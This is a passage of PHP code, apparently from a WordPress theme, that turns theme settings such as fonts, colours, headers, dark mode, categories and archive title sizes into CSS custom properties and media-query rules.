$buffer .= $this->font_var( $settings, 'h3', 'font_h3' ); $buffer .= $this->font_var( $settings, 'h4', 'font_h4' ); $buffer .= $this->font_var( $settings, 'h5', 'font_h5' ); $buffer .= $this->font_var( $settings, 'h6', 'font_h6' ); $buffer .= $this->font_var( $settings, 'cat', 'font_ecat' ); $buffer .= $this->font_var( $settings, 'meta', 'font_emeta' ); $buffer .= $this->font_var( $settings, 'meta-b', 'font_eauthor' ); $buffer .= $this->font_var( $settings, 'input', 'font_input' ); $buffer .= $this->font_var( $settings, 'btn', 'font_button' ); $buffer .= $this->font_var( $settings, 'menu', 'font_main_menu' ); $buffer .= $this->font_var( $settings, 'submenu', 'font_main_sub_menu' ); $buffer .= $this->font_var( $settings, 'dwidgets', 'font_widget' ); $buffer .= $this->font_var( $settings, 'headline', 'font_headline' ); $buffer .= $this->font_var( $settings, 'tagline', 'font_tagline' ); $buffer .= $this->font_var( $settings, 'heading', 'font_heading' ); $buffer .= $this->font_var( $settings, 'subheading', 'font_sub_heading' ); $buffer .= $this->font_var( $settings, 'quote', 'font_quote' ); $buffer .= $this->font_size_var( $settings, 'readmore', 'font_readmore' ); $buffer .= $this->font_size_var( $settings, 'bcrumb', 'font_breadcrumb' ); $buffer .= $this->font_size_var( $settings, 'excerpt', 'font_excerpt_size' ); $buffer .= $this->font_size_var( $settings, 'headline-s', 'font_headline_size_content' ); $buffer .= $this->font_size_var( $settings, 'tagline-s', 'font_tagline_size_content' ); if ( ! empty( $buffer ) ) { $output .= ':root {' . $buffer . '}'; } return $output; } /** * @param array $settings * * @return string */ function get_font_size_tablet( $settings = array() ) { $output = ''; $buffer = ''; $buffer .= $this->font_size_var( $settings, 'body', 'font_body_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'h1', 'font_h1_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'h2', 'font_h2_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'h3', 'font_h3_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'h4', 'font_h4_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'h5', 'font_h5_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'h6', 'font_h6_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'cat', 'font_ecat_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'meta', 'font_emeta_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'readmore', 'font_readmore_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'input', 'font_input_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'btn', 'font_button_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'bcrumb', 'font_breadcrumb_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'heading', 'font_heading_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'excerpt', 'font_excerpt_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'dwidgets', 'font_widget_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'headline', 'font_headline_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'headline-s', 'font_headline_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'tagline', 'font_tagline_size_tablet' ); $buffer .= $this->font_size_var( $settings, 'tagline-s', 'font_tagline_size_tablet' ); if ( ! empty( $buffer ) ) { $output .= '@media (max-width: 1024px) {'; $output .= 'body {' . $buffer . '}'; $output .= '}'; } return $output; } /** * @param array $settings * * @return string */ function get_font_size_mobile( $settings = array() ) { $output = ''; $buffer = ''; $buffer .= $this->font_size_var( $settings, 'body', 'font_body_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'h1', 'font_h1_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'h2', 'font_h2_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'h3', 'font_h3_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'h4', 'font_h4_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'h5', 'font_h5_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'h6', 'font_h6_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'cat', 'font_ecat_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'meta', 'font_emeta_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'readmore', 'font_readmore_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'input', 'font_input_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'btn', 'font_button_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'bcrumb', 'font_breadcrumb_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'heading', 'font_heading_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'excerpt', 'font_excerpt_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'dwidgets', 'font_widget_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'headline', 'font_headline_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'headline-s', 'font_headline_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'tagline', 'font_tagline_size_mobile' ); $buffer .= $this->font_size_var( $settings, 'tagline-s', 'font_tagline_size_mobile' ); if ( ! empty( $buffer ) ) { $output .= '@media (max-width: 767px) {'; $output .= 'body {' . $buffer . '}'; $output .= '}'; } return $output; } /** * @param array $settings * * @return string */ function get_colors_var_data( $settings = array() ) { $output = ''; if ( ! empty( $settings['global_color'] ) ) { $output .= '--g-color :' . $settings['global_color'] . ';'; $output .= '--g-color-90 :' . $settings['global_color'] . 'e6;'; } if ( ! empty( $settings['accent_color'] ) ) { $output .= '--dark-accent :' . $settings['accent_color'] . ';'; $output .= '--dark-accent-90 :' . $settings['accent_color'] . 'e6;'; $output .= '--dark-accent-0 :' . $settings['accent_color'] . '00;'; } if ( ! empty( $settings['review_color'] ) ) { $output .= '--review-color :' . $settings['review_color'] . ';'; } if ( ! empty( $settings['hyperlink_color'] ) ) { $output .= '--hyperlink-color :' . $settings['hyperlink_color'] . ';'; } if ( ! empty( $settings['icon_video_color'] ) ) { $output .= '--video-color :' . $settings['icon_video_color'] . ';'; } if ( ! empty( $settings['icon_gallery_color'] ) ) { $output .= '--gallery-color :' . $settings['icon_gallery_color'] . ';'; } if ( ! empty( $settings['icon_audio_color'] ) ) { $output .= '--audio-color :' . $settings['icon_audio_color'] . ';'; } if ( ! empty( $settings['excerpt_color'] ) ) { $output .= '--excerpt-color :' . $settings['excerpt_color'] . ';'; } if ( ! empty( $settings['breadcrumb_color'] ) ) { $output .= '--bcrumb-color :' . $settings['breadcrumb_color'] . ';'; } if ( ! empty( $settings['reading_indicator_color']['from'] ) ) { $output .= '--indicator-bg-from :' . $settings['reading_indicator_color']['from'] . ';'; } if ( ! empty( $settings['reading_indicator_color']['to'] ) ) { $output .= '--indicator-bg-to :' . $settings['reading_indicator_color']['to'] . ';'; } if ( ! empty( $settings['reading_indicator_height'] ) ) { $output .= '--indicator-height :' . absint( $settings['reading_indicator_height'] ) . 'px;'; } if ( ! empty( $settings['alert_bg'] ) ) { $output .= '--alert-bg :' . $settings['alert_bg'] . ';'; } if ( ! empty( $settings['alert_color'] ) ) { $output .= '--alert-color :' . $settings['alert_color'] . ';'; } return $output; } /** * @param array $settings * * @return string */ function get_colors_var_data_dark( $settings = array() ) { $output = ''; if ( ! empty( $settings['dark_global_color'] ) ) { $output .= '--g-color :' . $settings['dark_global_color'] . ';'; $output .= '--g-color-90 :' . $settings['dark_global_color'] . 'e6;'; } if ( ! empty( $settings['dark_background'] ) ) { $output .= '--solid-white :' . $settings['dark_background'] . ';'; } if ( ! empty( $settings['dark_accent_color'] ) ) { $output .= '--dark-accent :' . $settings['dark_accent_color'] . ';'; $output .= '--dark-accent-90 :' . $settings['dark_accent_color'] . 'e6;'; $output .= '--dark-accent-0 :' . $settings['dark_accent_color'] . '00;'; } if ( ! empty( $settings['dark_alert_bg'] ) ) { $output .= '--alert-bg :' . $settings['dark_alert_bg'] . ';'; } if ( ! empty( $settings['dark_alert_color'] ) ) { $output .= '--alert-color :' . $settings['dark_alert_color'] . ';'; } return $output; } /** * @param array $settings * * @return string */ function get_colors_var( $settings = array() ) { $output = ''; if ( $this->get_colors_var_data( $settings ) ) { $output .= ':root {'; $output .= $this->get_colors_var_data( $settings ); $output .= '}'; } if ( $this->get_colors_var_data_dark( $settings ) ) { $output .= '[data-theme="dark"], .light-scheme {'; $output .= $this->get_colors_var_data_dark( $settings ); $output .= '}'; } return $output; } /** * @param array $settings * * @return string */ function get_header_1_var_data( $settings = array() ) { $output = ''; $output .= $this->get_gradient_background_var( $settings, 'nav', 'hd1_background' ); $output .= $this->get_gradient_background_var( $settings, 'subnav', 'hd1_sub_background' ); if ( ! empty( $settings['hd1_color'] ) ) { $output .= '--nav-color :' . $settings['hd1_color'] . ';'; $output .= '--nav-color-10 :' . $settings['hd1_color'] . '1a;'; } if ( ! empty( $settings['hd1_sub_color'] ) ) { $output .= '--subnav-color :' . $settings['hd1_sub_color'] . ';'; $output .= '--subnav-color-10 :' . $settings['hd1_sub_color'] . '1a;'; } if ( ! empty( $settings['hd1_color_hover'] ) ) { $output .= '--nav-color-h :' . $settings['hd1_color_hover'] . ';'; } if ( ! empty( $settings['hd1_color_hover_accent'] ) ) { $output .= '--nav-color-h-accent :' . $settings['hd1_color_hover_accent'] . ';'; } if ( ! empty( $settings['hd1_sub_color_hover'] ) ) { $output .= '--subnav-color-h :' . $settings['hd1_sub_color_hover'] . ';'; } if ( ! empty( $settings['transparent_hd1_color'] ) ) { $output .= '--transparent-nav-color :' . $settings['transparent_hd1_color'] . ';'; } if ( ! empty( $settings['transparent_hd1_color_hover'] ) ) { $output .= '--transparent-nav-color-hover :' . $settings['transparent_hd1_color_hover'] . ';'; } if ( ! empty( $settings['transparent_hd1_color_hover_accent'] ) ) { $output .= '--transparent-nav-color-h-accent :' . $settings['transparent_hd1_color_hover_accent'] . ';'; } if ( ! empty( $settings['hd1_height'] ) ) { $output .= '--nav-height :' . floatval( $settings['hd1_height'] ) . 'px;'; } return $output; } /** * @param array $settings * * @return string */ function get_header_1_var_data_dark( $settings = array() ) { $output = ''; $output .= $this->get_gradient_background_var( $settings, 'nav', 'dark_hd1_background' ); $output .= $this->get_gradient_background_var( $settings, 'subnav', 'dark_hd1_sub_background' ); if ( ! empty( $settings['dark_hd1_color'] ) ) { $output .= '--nav-color :' . $settings['dark_hd1_color'] . ';'; $output .= '--nav-color-10 :' . $settings['dark_hd1_color'] . '1a;'; } if ( ! empty( $settings['dark_hd1_sub_color'] ) ) { $output .= '--subnav-color :' . $settings['dark_hd1_sub_color'] . ';'; $output .= '--subnav-color-10 :' . $settings['dark_hd1_sub_color'] . '1a;'; } if ( ! empty( $settings['dark_hd1_color_hover'] ) ) { $output .= '--nav-color-h :' . $settings['dark_hd1_color_hover'] . ';'; } if ( ! empty( $settings['dark_hd1_color_hover_accent'] ) ) { $output .= '--nav-color-h-accent :' . $settings['dark_hd1_color_hover_accent'] . ';'; } if ( ! empty( $settings['dark_hd1_sub_color_hover'] ) ) { $output .= '--subnav-color-h :' . $settings['dark_hd1_sub_color_hover'] . ';'; } return $output; } /** * @param array $settings * * @return string */ function get_header_4_var_data( $settings = array() ) { $output = ''; $output .= $this->get_gradient_background_var( $settings, 'nav', 'hd4_background' ); $output .= $this->get_gradient_background_var( $settings, 'subnav', 'hd4_sub_background' ); if ( ! empty( $settings['hd4_color'] ) ) { $output .= '--nav-color :' . $settings['hd4_color'] . ';'; $output .= '--nav-color-10 :' . $settings['hd4_color'] . '1a;'; } if ( ! empty( $settings['hd4_sub_color'] ) ) { $output .= '--subnav-color :' . $settings['hd4_sub_color'] . ';'; $output .= '--subnav-color-10 :' . $settings['hd4_sub_color'] . '1a;'; } if ( ! empty( $settings['hd4_color_hover'] ) ) { $output .= '--nav-color-h :' . $settings['hd4_color_hover'] . ';'; } if ( ! empty( $settings['hd4_color_hover_accent'] ) ) { $output .= '--nav-color-h-accent :' . $settings['hd4_color_hover_accent'] . ';'; } if ( ! empty( $settings['hd4_sub_color_hover'] ) ) { $output .= '--subnav-color-h :' . $settings['hd4_sub_color_hover'] . ';'; } if ( ! empty( $settings['hd4_height'] ) ) { $output .= '--nav-height :' . floatval( $settings['hd4_height'] ) . 'px;'; } if ( ! empty( $settings['hd4_logo_height'] ) ) { $output .= '--hd4-logo-height :' . floatval( $settings['hd4_logo_height'] ) . 'px;'; } return $output; } /** * @param array $settings * * @return string */ function get_header_4_var_data_dark( $settings = array() ) { $output = ''; $output .= $this->get_gradient_background_var( $settings, 'nav', 'dark_hd4_background' ); $output .= $this->get_gradient_background_var( $settings, 'subnav', 'dark_hd4_sub_background' ); if ( ! empty( $settings['dark_hd4_color'] ) ) { $output .= '--nav-color :' . $settings['dark_hd4_color'] . ';'; $output .= '--nav-color-10 :' . $settings['dark_hd4_color'] . '1a;'; } if ( ! empty( $settings['dark_hd4_sub_color'] ) ) { $output .= '--subnav-color :' . $settings['dark_hd4_sub_color'] . ';'; $output .= '--subnav-color-10 :' . $settings['dark_hd4_sub_color'] . '1a;'; } if ( ! empty( $settings['dark_hd4_color_hover'] ) ) { $output .= '--nav-color-h :' . $settings['dark_hd4_color_hover'] . ';'; } if ( ! empty( $settings['dark_hd4_color_hover_accent'] ) ) { $output .= '--nav-color-h-accent :' . $settings['dark_hd4_color_hover_accent'] . ';'; } if ( ! empty( $settings['dark_hd4_sub_color_hover'] ) ) { $output .= '--subnav-color-h :' . $settings['dark_hd4_sub_color_hover'] . ';'; } return $output; } /** * @param array $settings * * @return string */ function get_header_5_var_data( $settings = array() ) { $output = ''; $output .= $this->get_gradient_background_var( $settings, 'nav', 'hd5_background' ); $output .= $this->get_gradient_background_var( $settings, 'subnav', 'hd5_sub_background' ); if ( ! empty( $settings['hd5_color'] ) ) { $output .= '--nav-color :' . $settings['hd5_color'] . ';'; $output .= '--nav-color-10 :' . $settings['hd5_color'] . '1a;'; } if ( ! empty( $settings['hd5_sub_color'] ) ) { $output .= '--subnav-color :' . $settings['hd5_sub_color'] . ';'; $output .= '--subnav-color-10 :' . $settings['hd5_sub_color'] . '1a;'; } if ( ! empty( $settings['hd5_color_hover'] ) ) { $output .= '--nav-color-h :' . $settings['hd5_color_hover'] . ';'; } if ( ! empty( $settings['hd5_color_hover_accent'] ) ) { $output .= '--nav-color-h-accent :' . $settings['hd5_color_hover_accent'] . ';'; } if ( ! empty( $settings['hd5_sub_color_hover'] ) ) { $output .= '--subnav-color-h :' . $settings['hd5_sub_color_hover'] . ';'; } if ( ! empty( $settings['hd5_height'] ) ) { $output .= '--nav-height :' . floatval( $settings['hd5_height'] ) . 'px;'; } if ( ! empty( $settings['hd5_logo_height'] ) ) { $output .= '--hd5-logo-height :' . floatval( $settings['hd5_logo_height'] ) . 'px;'; } return $output; } /** * @param array $settings * * @return string */ function get_header_5_var_data_dark( $settings = array() ) { $output = ''; $output .= $this->get_gradient_background_var( $settings, 'nav', 'dark_hd5_background' ); $output .= $this->get_gradient_background_var( $settings, 'subnav', 'dark_hd5_sub_background' ); if ( ! empty( $settings['dark_hd5_color'] ) ) { $output .= '--nav-color :' . $settings['dark_hd5_color'] . ';'; $output .= '--nav-color-10 :' . $settings['dark_hd5_color'] . '1a;'; } if ( ! empty( $settings['dark_hd5_sub_color'] ) ) { $output .= '--subnav-color :' . $settings['dark_hd5_sub_color'] . ';'; } if ( ! empty( $settings['dark_hd5_color_hover'] ) ) { $output .= '--nav-color-h :' . $settings['dark_hd5_color_hover'] . ';'; } if ( ! empty( $settings['dark_hd5_color_hover_accent'] ) ) { $output .= '--nav-color-h-accent :' . $settings['dark_hd5_color_hover_accent'] . ';'; } if ( ! empty( $settings['dark_hd5_sub_color_hover'] ) ) { $output .= '--subnav-color-h :' . $settings['dark_hd5_sub_color_hover'] . ';'; } return $output; } /** * @param array $settings * * @return string */ function get_header_1_var( $settings = array() ) { $output = ''; if ( $this->get_header_1_var_data( $settings ) ) { $output .= '.is-hd-1, .is-hd-2, .is-hd-3 {'; $output .= $this->get_header_1_var_data( $settings ); $output .= '}'; } if ( $this->get_header_1_var_data_dark( $settings ) ) { $output .= '[data-theme="dark"].is-hd-1, [data-theme="dark"].is-hd-2,[data-theme="dark"].is-hd-3 {'; $output .= $this->get_header_1_var_data_dark( $settings ); $output .= '}'; } return $output; } /** * @param array $settings * * @return string */ function get_header_4_var( $settings = array() ) { $output = ''; if ( $this->get_header_4_var_data( $settings ) ) { $output .= '.is-hd-4 {'; $output .= $this->get_header_4_var_data( $settings ); $output .= '}'; } if ( $this->get_header_4_var_data_dark( $settings ) ) { $output .= '[data-theme="dark"].is-hd-4 {'; $output .= $this->get_header_4_var_data_dark( $settings ); $output .= '}'; } return $output; } /** * @param array $settings * * @return string */ function get_header_5_var( $settings = array() ) { $output = ''; if ( $this->get_header_5_var_data( $settings ) ) { $output .= '.is-hd-5, body.is-hd-5:not(.sticky-on) {'; $output .= $this->get_header_5_var_data( $settings ); $output .= '}'; } if ( $this->get_header_5_var_data_dark( $settings ) ) { $output .= '[data-theme="dark"].is-hd-5, [data-theme="dark"].is-hd-5:not(.sticky-on) {'; $output .= $this->get_header_5_var_data_dark( $settings ); $output .= '}'; } return $output; } /** * @param array $settings * * @return string */ function get_mobile_header_var_data( $settings = array() ) { $output = ''; $output .= $this->get_gradient_background_var( $settings, 'mbnav', 'mobile_background' ); $output .= $this->get_gradient_background_var( $settings, 'submbnav', 'mobile_sub_background' ); if ( ! empty( $settings['mobile_color'] ) ) { $output .= '--mbnav-color :' . $settings['mobile_color'] . ';'; } if ( ! empty( $settings['mobile_sub_color'] ) ) { $output .= '--submbnav-color :' . $settings['mobile_sub_color'] . ';'; $output .= '--submbnav-color-10 :' . $settings['mobile_sub_color'] . '1a;'; } return $output; } /** * @param array $settings * * @return string */ function get_mobile_header_var_data_dark( $settings = array() ) { $output = ''; $output .= $this->get_gradient_background_var( $settings, 'mbnav', 'dark_mobile_background' ); $output .= $this->get_gradient_background_var( $settings, 'submbnav', 'dark_mobile_sub_background' ); if ( ! empty( $settings['dark_mobile_color'] ) ) { $output .= '--mbnav-color :' . $settings['dark_mobile_color'] . ';'; } if ( ! empty( $settings['dark_mobile_sub_color'] ) ) { $output .= '--submbnav-color :' . $settings['dark_mobile_sub_color'] . ';'; } return $output; } /** * @param array $settings * * @return string */ function get_mobile_header_var( $settings = array() ) { $output = ''; if ( $this->get_mobile_header_var_data( $settings ) ) { $output .= ':root {'; $output .= $this->get_mobile_header_var_data( $settings ); $output .= '}'; } if ( $this->get_mobile_header_var_data_dark( $settings ) ) { $output .= '[data-theme="dark"] {'; $output .= $this->get_mobile_header_var_data_dark( $settings ); $output .= '}'; } return $output; } /** * @param array $settings * * @return string */ function get_global_var_data( $settings = array() ) { $output = ''; if ( ! empty( $settings['privacy_bg_color'] ) ) { $output .= '--privacy-bg-color :' . $settings['privacy_bg_color'] . ';'; } if ( ! empty( $settings['privacy_text_color'] ) ) { $output .= '--privacy-color :' . $settings['privacy_text_color'] . ';'; } if ( ! empty( $settings['single_post_width_wo_sb'] ) ) { $output .= '--max-width-wo-sb : 860px;'; } if ( ! empty( $settings['ad_top_bg'] ) ) { $output .= '--top-site-bg :' . $settings['ad_top_bg'] . ';'; } if ( ! empty( $settings['custom_border'] ) ) { $settings['custom_border'] = absint( $settings['custom_border'] ); $custom_small_border = $settings['custom_border'] - 3; $custom_big_border = $settings['custom_border'] + 5; if ( $custom_small_border < 2 ) { $custom_small_border = 2; } $output .= '--round-3 :' . $custom_small_border . 'px;'; $output .= '--round-5 :' . $settings['custom_border'] . 'px;'; $output .= '--round-7 :' . $custom_big_border . 'px;'; } elseif ( ! empty( $settings['design_border'] ) ) { $output .= '--round-3 :0px;'; $output .= '--round-5 :0px;'; $output .= '--round-7 :0px;'; } if ( ! empty( $settings['hyperlink_line'] ) ) { if ( empty( $settings['hyperlink_line_color'] ) ) { $settings['hyperlink_line_color'] = 'var(--g-color)'; } if ( empty( $settings['dark_hyperlink_line_color'] ) ) { $settings['dark_hyperlink_line_color'] = 'var(--g-color)'; } } else { unset( $settings['hyperlink_line_color'] ); unset( $settings['dark_hyperlink_line_color'] ); } if ( ! empty( $settings['hyperlink_color'] ) ) { $output .= '--hyperlink-color :' . $settings['hyperlink_color'] . ';'; } if ( ! empty( $settings['hyperlink_line_color'] ) ) { $output .= '--hyperlink-line-color :' . $settings['hyperlink_line_color'] . ';'; } if ( ! empty( $settings['hyperlink_style'] ) ) { switch ( $settings['hyperlink_style'] ) { case 'bold_italic' : $output .= '--hyperlink-weight :700;'; $output .= '--hyperlink-style :italic;'; break; case 'italic' : $output .= '--hyperlink-weight :400;'; $output .= '--hyperlink-style :italic;'; break; case 'bold' : $output .= '--hyperlink-weight :700;'; break; case 'normal' : $output .= '--hyperlink-weight :400;'; break; } } if ( ! empty( $settings['mobile_height'] ) ) { $output .= '--mbnav-height :' . $settings['mobile_height'] . 'px;'; } if ( ! empty( $settings['footer_logo_height'] ) ) { $output .= '--flogo-height :' . $settings['footer_logo_height'] . 'px;'; } if ( ! empty( $settings['single_post_entry_category_size'] ) ) { $output .= '--single-category-fsize :' . $settings['single_post_entry_category_size'] . 'px;'; } /** wc */ $output .= $this->font_var( $settings, 'price', 'font_price' ); $output .= $this->font_var( $settings, 'product', 'font_product' ); if ( ! empty( $settings['wc_price_color'] ) ) { $output .= '--wc-price-color :' . $settings['wc_price_color'] . ';'; } if ( ! empty( $settings['wc_sale_color'] ) ) { $output .= '--wc-sale-bg :' . $settings['wc_sale_color'] . ';'; } if ( ! empty( $settings['wc_star_color'] ) ) { $output .= '--wc-star-color :' . $settings['wc_star_color'] . ';'; } if ( ! empty( $settings['wc_add_cart_color'] ) ) { $output .= '--wc-add-cart-bg :' . $settings['wc_add_cart_color'] . ';'; $output .= '--wc-add-cart-bg-90 :' . $settings['wc_add_cart_color'] . 'e6;'; } if ( ! empty( $settings['more_width'] ) ) { $output .= '--more-width :' . absint( $settings['more_width'] ) . 'px;'; } if ( ! empty( $settings['slide_up_bg']['rgba'] ) ) { $output .= '--slideup-bg :' . $settings['slide_up_bg']['rgba'] . ';'; } if ( ! empty( $settings['slide_up_icon_color'] ) ) { $output .= '--slideup-icon-color :' . $settings['slide_up_icon_color'] . ';'; } if ( ! empty( $settings['slide_up_na_icon_color'] ) ) { $output .= '--slideup-icon-na-color :' . $settings['slide_up_na_icon_color'] . ';'; } if ( ! empty( $settings['slide_up_na_icon_bg'] ) ) { $output .= '--slideup-icon-na-bg :' . $settings['slide_up_na_icon_bg'] . ';'; $output .= '--slideup-icon-na-bg-90 :' . $settings['slide_up_na_icon_bg'] . 'e6;'; } return $output; } /** * @param array $settings * * @return string */ function get_global_var( $settings = array() ) { $output = ''; if ( $this->get_global_var_data( $settings ) ) { $output .= ':root {'; $output .= $this->get_global_var_data( $settings ); $output .= '}'; } return $output; } /** * @param array $settings * * @return string */ function get_categories_var( $settings = array() ) { $output = ''; $category_settings = get_option( 'foxiz_category_meta', array() ); if ( ! empty( $settings['category_highlight_color'] ) || ! empty( $settings['category_color'] ) ) { $output .= '.p-category {'; if ( ! empty( $settings['category_highlight_color'] ) && strlen( $settings['category_highlight_color'] ) > 3 ) { $output .= '--cat-highlight : ' . $settings['category_highlight_color'] . ';'; $output .= '--cat-highlight-90 : ' . $settings['category_highlight_color'] . 'e6;'; } if ( ! empty( $settings['category_color'] ) && strlen( $settings['category_color'] ) > 3 ) { $output .= '--cat-fcolor : ' . $settings['category_color'] . ';'; } $output .= '}'; } if ( ! empty( $settings['category_dark_color'] ) && strlen( $settings['category_dark_color'] ) > 3 ) { $output .= '[data-theme="dark"] .p-category {'; $output .= '--cat-fcolor : ' . $settings['category_dark_color'] . ';'; $output .= '}'; } if ( ! empty( $settings['category_blog_heading_size'] ) ) { $output .= 'body.category .blog-content {'; $output .= '--heading-size-desktop : ' . floatval( $settings['category_blog_heading_size'] ) . 'px;'; $output .= '}'; } foreach ( $category_settings as $id => $values ) { $highlight = ''; $color = ''; $dark_color = ''; $title_size = ''; $title_size_mobile = ''; $title_size_tablet = ''; $ratio = ''; if ( ! empty( $values['highlight_color'] ) && strlen( $values['highlight_color'] ) > 3 ) { $highlight = $values['highlight_color']; } elseif ( ! empty( $settings['category_highlight_color'] ) ) { $highlight = $settings['category_highlight_color']; } if ( ! empty( $values['color'] ) && strlen( $values['color'] ) > 3 ) { $color = $values['color']; } elseif ( ! empty( $settings['category_color'] ) ) { $color = $settings['category_color']; } if ( ! empty( $values['dark_color'] ) && strlen( $values['dark_color'] ) > 3 ) { $dark_color = $values['dark_color']; } elseif ( ! empty( $settings['category_dark_color'] ) ) { $dark_color = $settings['category_dark_color']; } if ( ! empty( $values['title_size'] ) ) { $title_size = $values['title_size']; } elseif ( ! empty( $settings['category_title_size'] ) ) { $title_size = $settings['category_title_size']; } if ( ! empty( $values['title_size_mobile'] ) ) { $title_size_mobile = $values['title_size_mobile']; } elseif ( ! empty( $settings['category_title_size_mobile'] ) ) { $title_size_mobile = $settings['category_title_size_mobile']; } if ( ! empty( $values['title_size_tablet'] ) ) { $title_size_tablet = $values['title_size_tablet']; } elseif ( ! empty( $settings['category_title_size_table'] ) ) { $title_size_tablet = $settings['category_title_size_table']; } if ( ! empty( $values['display_ratio'] ) ) { $ratio = $values['display_ratio']; } elseif ( ! empty( $settings['category_display_ratio'] ) ) { $ratio = $settings['category_display_ratio']; } /** category color */ if ( ! empty( $highlight ) || ( ! empty( $color ) && strlen( $color ) > 2 ) ) { $output .= '.p-category.category-id-' . $id . ', .meta-category .category-' . $id . ' {'; if ( ! empty( $highlight ) ) { $output .= '--cat-highlight : ' . $highlight . ';'; $output .= '--cat-highlight-90 : ' . $highlight . 'e6;'; } if ( ! empty( $color ) && strlen( $color ) > 2 ) { $output .= '--cat-fcolor : ' . $color . ';'; } $output .= '}'; } if ( ! empty( $highlight ) ) { $output .= '.category-' . $id . ' .blog-content {'; $output .= '--heading-sub-color : ' . $highlight . ';'; $output .= '}'; } if ( ! empty( $dark_color ) && strlen( $dark_color ) > 2 ) { $output .= '[data-theme="dark"] .p-category.category-id-' . $id . ' {'; $output .= '--cat-fcolor : ' . $dark_color . ';'; $output .= '}'; } if ( ! empty( $highlight ) && strlen( $highlight ) > 3 ) { $output .= '.is-cbox-' . $id . ' {'; $output .= '--cbox-bg : ' . $highlight . 'e6;'; $output .= '}'; } /** featured */ if ( ! empty( $ratio ) ) { $output .= 'body.category-' . $id . ' .blog-content .p-featured {'; $output .= 'padding-bottom : ' . floatval( $ratio ) . '%;'; $output .= '}'; } if ( ! empty( $values['blog_heading_size'] ) ) { $output .= 'body.category-' . $id . ' .blog-content {'; $output .= '--heading-size-desktop : ' . floatval( $values['blog_heading_size'] ) . 'px;'; $output .= '}'; } /** category title font size */ if ( ! empty( $title_size ) ) { $output .= 'body.category-' . $id . ' .blog-content {'; $output .= '--title-size: ' . floatval( $title_size ) . 'px;'; $output .= '}'; } if ( ! empty( $title_size_tablet ) ) { $output .= '@media (max-width: 1024px){'; $output .= 'body.category-' . $id . ' .blog-content {'; $output .= '--title-size: ' . floatval( $title_size_tablet ) . 'px;'; $output .= '}}'; } if ( ! empty( $title_size_mobile ) ) { $output .= '@media (max-width: 767px){'; $output .= 'body.category-' . $id . ' .blog-content {'; $output .= '--title-size: ' . floatval( $title_size_mobile ) . 'px;'; $output .= '}}'; } } return $output; } /** * @param $settings * * @return string */ function get_archive_var( $settings ) { $output = ''; if ( ! empty( $settings['archive_title_size'] ) ) { $output .= '.archive .blog-content {'; $output .= '--title-size: ' . floatval( $settings['archive_title_size'] ) . 'px;'; $output .= '}'; } if ( ! empty( $settings['archive_title_size_tablet'] ) ) { $output .= '@media (max-width: 1024px){'; $output .= '.archive .blog-content {'; $output .= '--title-size: ' . floatval( $settings['archive_title_size_tablet'] ) . 'px;'; $output .= '}}'; } if ( ! empty( $settings['archive_title_size_mobile'] ) ) { $output .= '@media (max-width: 767px){'; $output .= '.archive .blog-content {'; $output .= '--title-size: ' . floatval( $settings['archive_title_size_mobile'] ) . 'px;'; $output .= '}}'; } /** search page */ if ( ! empty( $settings['search_title_size'] ) ) { $output .= 'body.search .blog-content {'; $output .= '--title-size: ' . floatval( $settings['search_title_size'] ) . 'px;'; $output .= '}'; } if ( ! empty( $settings['search_title_size_tablet'] ) ) { $output .= '@media (max-width: 1024px){'; $output .= 'body.search .blog-content {'; $output .= '--title-size: ' . floatval( $settings['search_title_size_tablet'] ) . 'px;'; $output .= '}}'; } if ( ! empty( $settings['search_title_size_mobile'] ) ) { $output .= '@media (max-width: 767px){'; $output .= 'body.search .blog-content {'; $output .= '--title-size: ' . floatval( $settings['search_title_size_mobile'] ) . 'px;'; $output .= '}}'; } /** blog */ if ( ! empty( $settings['blog_title_size'] ) ) { $output .= 'body.blog .blog-content {'; $output .= '--title-size: ' . floatval( $settings['blog_title_size'] ) . 'px;'; $output .= '}'; } if ( ! empty( $settings['blog_title_size_tablet'] ) ) { $output .= '@media (max-width: 1024px){'; $output .= 'body.blog .blog-content {'; $output .= '--title-size: ' . floatval( $settings['blog_title_size_tablet'] ) . 'px;'; $output .= '}}'; } if ( ! empty( $settings['blog_title_size_mobile'] ) ) { $output .= '@media (max-width: 767px){'; $output .= 'body.blog .blog-content {'; $output .= '--title-size: ' . floatval( $settings['blog_title_size_mobile'] ) . 'px;'; $output .= '}}'; } /** saved section */ if ( ! empty( $settings['saved_title_size'] ) ) { $output .= '.saved-section .blog-content {'; $output .= '--title-size: ' . floatval( $settings['saved_title_size'] ) . 'px;'; $output .= '}'; } if ( ! empty( $settings['saved_title_size_tablet'] ) ) { $output .= '@media (max-width: 1024px){'; $output .= '.saved-section .blog-content {'; $output .= '--title-size: ' . floatval( $settings['saved_title_size_tablet'] ) . 